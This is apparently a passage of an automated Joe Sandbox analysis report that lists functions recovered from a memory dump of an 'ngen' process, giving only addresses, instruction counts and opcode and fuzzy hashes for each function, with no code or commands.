                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3344e55447883df3acc42c825bebc73a3ce8269b1ee66c8e6f5252d170570800
                                                                                                                      • Instruction ID: 1df72a82b1a56d95161007b7c163d8143c0bc037f854a5b8fdc3c4bf640ce8c9
                                                                                                                      • Opcode Fuzzy Hash: 3344e55447883df3acc42c825bebc73a3ce8269b1ee66c8e6f5252d170570800
                                                                                                                      • Instruction Fuzzy Hash: 76319A35715A06FFDB55AB24DA88EA9BBA6FF84320F406025ED0187B51D730E830EF90
                                                                                                                      Function 0576A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                      • Instruction ID: f33e41634a392519ba4d7efe740f4fb62a5c1391989346c06496065c4b92153a
                                                                                                                      • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                      • Instruction Fuzzy Hash: 4A313A72B04B00EFD760CF69DE44B57B7F9BB48B50F08492DA99AD3650E630E900DB61
                                                                                                                      Function 05787190 Relevance: .1, Instructions: 89COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                      • Instruction ID: 5d5d06d8533f7e54e41098c499f8f9828a891e143880186f59aa7cf6bfc84064
                                                                                                                      • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                      • Instruction Fuzzy Hash: 27319A35A04206CFC714CF18C480926FBF6FF89310B2485A9E95A9B315EB31FD06DB91
                                                                                                                      Function 0572E420 Relevance: .1, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 494468229848bbeb5347f5b81ac30c181461c40246864d4ae48048051f53293d
                                                                                                                      • Instruction ID: 8b088efe3c9db4c1918deac1d8bc411028796288910a94c8dae3f6ef02e5d389
                                                                                                                      • Opcode Fuzzy Hash: 494468229848bbeb5347f5b81ac30c181461c40246864d4ae48048051f53293d
                                                                                                                      • Instruction Fuzzy Hash: EF31C032A0112C9BDB31DF15CC45FFEB7BEAB05740F0104A5FA45AB290D674AE80AFA0
                                                                                                                      Function 0572C156 Relevance: .1, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d812d36e4ad28ceef4eb4983371550c8697e0d54d59b43cec44247797d7b3fd4
                                                                                                                      • Instruction ID: 60af924cbf9334fee1557d62c0c5ba76e64d7c7cd9ab784f8ee0d6ea2e7baa35
                                                                                                                      • Opcode Fuzzy Hash: d812d36e4ad28ceef4eb4983371550c8697e0d54d59b43cec44247797d7b3fd4
                                                                                                                      • Instruction Fuzzy Hash: 8531D6756402109BCB31BF18C849BB97BB5BF40314F54C1A9EC469B382EB749986EB90
                                                                                                                      Function 05764588 Relevance: .1, Instructions: 87COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                      • Instruction ID: feada7bc9d4ecf962bbc28ff3fb1571caf07d17c55f5c7d1f880c416e844727f
                                                                                                                      • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                      • Instruction Fuzzy Hash: C1217F32B00608EBCF15CF98C9C4A8EBBB6FF48714F108069ED159F241D671EA05EB90
                                                                                                                      Function 057644B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 368ea9ed918869d360bacfdadadd5dd29256d6af83a4057bd2d243285220078e
                                                                                                                      • Instruction ID: 55c8a4ed9834c2ceda2db9f8dbf9f60c7acc54f27203c8e957b82bdad1e9c87c
                                                                                                                      • Opcode Fuzzy Hash: 368ea9ed918869d360bacfdadadd5dd29256d6af83a4057bd2d243285220078e
                                                                                                                      • Instruction Fuzzy Hash: 1F21D5726047459BCF21DF19C884B6B77E6FF88760F044A29FC559B241D770EA00DBA2
                                                                                                                      Function 057AE609 Relevance: .1, Instructions: 86COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8e80bc5d0ab8d093d57c97c9fc1c837beb2f98875fc7256a17f8dbd5cc71e465
                                                                                                                      • Instruction ID: 99e564718012aba1095c7b3b001cc66d977105d11bfb18bac1bf0e4884fb5c63
                                                                                                                      • Opcode Fuzzy Hash: 8e80bc5d0ab8d093d57c97c9fc1c837beb2f98875fc7256a17f8dbd5cc71e465
                                                                                                                      • Instruction Fuzzy Hash: 20317F76600205EFCB14CF58C888DAEB7BAFFC4304B154959EC0A9B391EB71EA50DB91
                                                                                                                      Function 0576D530 Relevance: .1, Instructions: 85COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: da7c607e5a5bcd7a3082be94cdc33dff14b0e46ee6ae37ffd4bf9097fcd323ae
                                                                                                                      • Instruction ID: ae34427855aa0f515f7d55b5180229bd378b6f88e11337d2f0df2279bb7673e1
                                                                                                                      • Opcode Fuzzy Hash: da7c607e5a5bcd7a3082be94cdc33dff14b0e46ee6ae37ffd4bf9097fcd323ae
                                                                                                                      • Instruction Fuzzy Hash: C021D3727142509BC620EF69D94CF167FE9EB85654F400925FE05D7690EF30DC44EBA2
                                                                                                                      Function 05733616 Relevance: .1, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8716deff3401d893c927fbf78d3c9576ab36a425faeda085793e1d06fbfaad2f
                                                                                                                      • Instruction ID: 08a8ea3ec882a8ab912c94c022dcfc0a233ee17dd5db71aa955a8eb8b5254017
                                                                                                                      • Opcode Fuzzy Hash: 8716deff3401d893c927fbf78d3c9576ab36a425faeda085793e1d06fbfaad2f
                                                                                                                      • Instruction Fuzzy Hash: 8621C331205250DFCB319F15C989B26BFA2FB80B20F554969E8454B752DB74EC44EB82
                                                                                                                      Function 057B06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: efc205d136b15a8fa4ad7d1a692f53e48354eab8059b1c38f1d3d06e31385f44
                                                                                                                      • Instruction ID: 3a77583b89fbc796507a8c0cccc45f92cfa1e849ec69281d6b35473c9f0a0889
                                                                                                                      • Opcode Fuzzy Hash: efc205d136b15a8fa4ad7d1a692f53e48354eab8059b1c38f1d3d06e31385f44
                                                                                                                      • Instruction Fuzzy Hash: B0218071A00229ABDF20DF59C889ABEB7F4FF48740B504069F941AB240D778AD41DFA1
                                                                                                                      Function 05769660 Relevance: .1, Instructions: 78COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cc7188c8f298d3a61c68d9b32440a62645bd59259377308326afe0c5591ce4a6
                                                                                                                      • Instruction ID: c6eadf9853761026dafbe8e6202c388264114d2d1158d2673c23cb8af60c7eba
                                                                                                                      • Opcode Fuzzy Hash: cc7188c8f298d3a61c68d9b32440a62645bd59259377308326afe0c5591ce4a6
                                                                                                                      • Instruction Fuzzy Hash: 10210072200704DBCF31AE26C849F367BA3BB80324F144719EE56869A0EB31AC81FB51
                                                                                                                      Function 057B019F Relevance: .1, Instructions: 78COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3ce5f2465975fdcbd4bf4e098a70b88c5b16c7cab96d56e15f17d58a1b202b63
                                                                                                                      • Instruction ID: 657220f01643bb5313eb6d823cb40560fb55167aa9f32a015f503921ab0387df
                                                                                                                      • Opcode Fuzzy Hash: 3ce5f2465975fdcbd4bf4e098a70b88c5b16c7cab96d56e15f17d58a1b202b63
                                                                                                                      • Instruction Fuzzy Hash: 4F21AC71600658AFDB15DBA8D848FAAB7B8FF48740F140069F905DB7A0D774ED40DBA8
                                                                                                                      Function 057AD0C0 Relevance: .1, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                      • Instruction ID: 43449b53752f9259802987118c86ecf57e0c1476b7143482c78c231072528fab
                                                                                                                      • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                      • Instruction Fuzzy Hash: E9210473654704ABC321DF18CC41B5BBBA5FF88720F01062EF9499B7A0D330D801ABAA
                                                                                                                      Function 057515A9 Relevance: .1, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                                      • Instruction ID: 02b844bf8628d3fd1606b53cbd0d04a379d7c151f2282e6571a61ff70e40c7ba
                                                                                                                      • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                                      • Instruction Fuzzy Hash: 182123B1706685CFDB16CB5AD84CF6177EABF40350F0904A0EC468B2A2E778DC40EB60
                                                                                                                      Function 0572B765 Relevance: .1, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 3940d03cd616bfa20c8b6f471c2f756dc1c21eb092079294d894b179d8bf36ee
                                                                                                                      • Instruction ID: d57e6e268169ff507d09b2a5efbc015e32c6df72aa623c10da9838944b2d6328
                                                                                                                      • Opcode Fuzzy Hash: 3940d03cd616bfa20c8b6f471c2f756dc1c21eb092079294d894b179d8bf36ee
                                                                                                                      • Instruction Fuzzy Hash: 9A218C32210610DFC725EF29C949F19BBF5FF08708F14892CE01A97AA1DB34A840EF44
                                                                                                                      Function 05738770 Relevance: .1, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 06a8c348a8ddc60c9333f49af9ffc673a9a245d5f785c33b409ca1a7b84a7536
                                                                                                                      • Instruction ID: 5fa3a694bc3516bd488172fcc0b7ad167fccae92ffabc4d4d56cffd023ea6fdf
                                                                                                                      • Opcode Fuzzy Hash: 06a8c348a8ddc60c9333f49af9ffc673a9a245d5f785c33b409ca1a7b84a7536
                                                                                                                      • Instruction Fuzzy Hash: 8A11C471702614DFCB11CF99C4C1A66BBEABF4A760B18406AFD09EF306D6B2E901D791
                                                                                                                      Function 05760124 Relevance: .1, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                      • Instruction ID: 9080f0c339a757ed115e17fd53fdfe0e97d70133e5ba55b608df4cee20b1db56
                                                                                                                      • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                      • Instruction Fuzzy Hash: AE110473601604BFD7269F44CC48FAEBBB9EB80754F100029FA048F180D675ED44EB50
                                                                                                                      Function 05733720 Relevance: .1, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b4fe1f48c5c6a14a1621add2031b6df8d42656429e50eebe5400dd69273e93cb
                                                                                                                      • Instruction ID: a6f65e42544da238bf306b748748e1a93d2d6e94739095055d6671e37cd5c592
                                                                                                                      • Opcode Fuzzy Hash: b4fe1f48c5c6a14a1621add2031b6df8d42656429e50eebe5400dd69273e93cb
                                                                                                                      • Instruction Fuzzy Hash: 2B21D771A042098FEB25CF6DD08A7EE7FB4FB88328F298418D852572D1CBB89945D750
                                                                                                                      Function 057380E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 99c60ed412cb17fde6e89db1dc5997416fe1e928a53d40bc3851d391e764b0fd
                                                                                                                      • Instruction ID: 5375ca2423811f1d7075f97d54fde19c53538a14f0c2f7aa8cf93c717c5e75a6
                                                                                                                      • Opcode Fuzzy Hash: 99c60ed412cb17fde6e89db1dc5997416fe1e928a53d40bc3851d391e764b0fd
                                                                                                                      • Instruction Fuzzy Hash: BC21A171A11205DFCB14CF98C581A6EBBF6FB88324F24416DE105AB311DB71AD06DBD1
                                                                                                                      Function 0576674D Relevance: .1, Instructions: 65COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ec8983cb88591bd62a302f4ecbad6168b301e2fb6271ae2228d5df6787746c48
                                                                                                                      • Instruction ID: 6d99392e6de5af0255832fbea4a9d61fd179c7e321408dff0cfe1bb38f35d08e
                                                                                                                      • Opcode Fuzzy Hash: ec8983cb88591bd62a302f4ecbad6168b301e2fb6271ae2228d5df6787746c48
                                                                                                                      • Instruction Fuzzy Hash: 01216D71610A00EFC720DF68C881F66B7E9FB44350F80882DE89AC7650DB70AC40EB61
                                                                                                                      Function 057666B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 66f6cbfbb34f1b7e20dbe669f2c74a49460ed624006101002babb85e277b5226
                                                                                                                      • Instruction ID: d6c6c56478976f38695e4265421d854db7b835da0f14c102a438f824091a960b
                                                                                                                      • Opcode Fuzzy Hash: 66f6cbfbb34f1b7e20dbe669f2c74a49460ed624006101002babb85e277b5226
                                                                                                                      • Instruction Fuzzy Hash: 1C11C1B6A01245DFCB25DF59D584E5ABBEAEF84710F458079EC059B310EB30DD00EB90
                                                                                                                      Function 057527ED Relevance: .1, Instructions: 58COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 24c771b5045702676c03df99fa11508ecfc74128e3af465a604a9a9d562ae733
                                                                                                                      • Instruction ID: 64a8b489553b68dd982479b6883055cf18ddf9da0cf337f1fb7d26e4cd7c4f57
                                                                                                                      • Opcode Fuzzy Hash: 24c771b5045702676c03df99fa11508ecfc74128e3af465a604a9a9d562ae733
                                                                                                                      • Instruction Fuzzy Hash: 1101263570A654ABE31AA2AAE84CF67779DEF81364F090074FC018B241DA65EC00E2B1
                                                                                                                      Function 057ED6F0 Relevance: .1, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                                                      • Instruction ID: eba321926df3676aeba93ce8e5c6daf81e3bf76323bc619ea72d3dbb1e448d03
                                                                                                                      • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                                                      • Instruction Fuzzy Hash: 13016175704209AF9B15DBE6C988DAF7BBDEF89B44F04005DAA15D3200E730EE41E7A0
                                                                                                                      Function 05734690 Relevance: .1, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 57bba11f01d880f3450bfe0c38598e8e0e63ee96c265ca8866fa286442295bba
                                                                                                                      • Instruction ID: c857eabb6d21f5d1b87a30c7c66d02f67817b49a7432487f0c47ff7be4ab8db5
                                                                                                                      • Opcode Fuzzy Hash: 57bba11f01d880f3450bfe0c38598e8e0e63ee96c265ca8866fa286442295bba
                                                                                                                      • Instruction Fuzzy Hash: 22119A76244644AFCF29CF59D84EF567BAAEB86B74F008119F8458B692C770E800EF60
                                                                                                                      Function 0575B052 Relevance: .1, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6d880f9392085e15eee64773efbc6e97d6247c51d1a983899fa192a9ff5fe361
                                                                                                                      • Instruction ID: a98a16f3b8cb761d127edab1bc3e0e1e7f3f97b623ff770eb61afae1475dbd78
                                                                                                                      • Opcode Fuzzy Hash: 6d880f9392085e15eee64773efbc6e97d6247c51d1a983899fa192a9ff5fe361
                                                                                                                      • Instruction Fuzzy Hash: 1401D6727003046BD710AB6A9C89F7BB7E9EF84224F040039EE0FC7240EAB0E901A621
                                                                                                                      Function 05766620 Relevance: .1, Instructions: 56COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b220ffc39c2404dbbeef715b7b0c2316a1444c3957698fce727303a7bb0a353c
                                                                                                                      • Instruction ID: c768bb9c44886713156c9615c0d17b215851dd5557fbc731dcfedab3dbd6ffd6
                                                                                                                      • Opcode Fuzzy Hash: b220ffc39c2404dbbeef715b7b0c2316a1444c3957698fce727303a7bb0a353c
                                                                                                                      • Instruction Fuzzy Hash: 2311A572A00715ABCB21EF59E9C4B5EFBB8FF44750F900455DD05A7241DB30ED41AB90
                                                                                                                      Function 0575E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                      • Instruction ID: 86db600d234a2f86c7772b7017bc68d97986c5978e78b961f9176aa42e4e7f24
                                                                                                                      • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                      • Instruction Fuzzy Hash: B41125323056C29BEB279B29E84CF243799FB01764F1900E0DD01C7641F378C942EA21
                                                                                                                      Function 057AE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e2792e70558d1cdba23794edf889db3f5aca552672e64d3d9ca88afc06c16690
                                                                                                                      • Instruction ID: 631869181d7ff56b6018aa93b7050d62df0e99c7fa42ad19d484a9f3f3e37461
                                                                                                                      • Opcode Fuzzy Hash: e2792e70558d1cdba23794edf889db3f5aca552672e64d3d9ca88afc06c16690
                                                                                                                      • Instruction Fuzzy Hash: E4118B32241640EFCB15EF19CD89F56BBB8FF88B94F200465ED059B6A1D635ED01DA90
                                                                                                                      Function 0573208A Relevance: .0, Instructions: 50COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
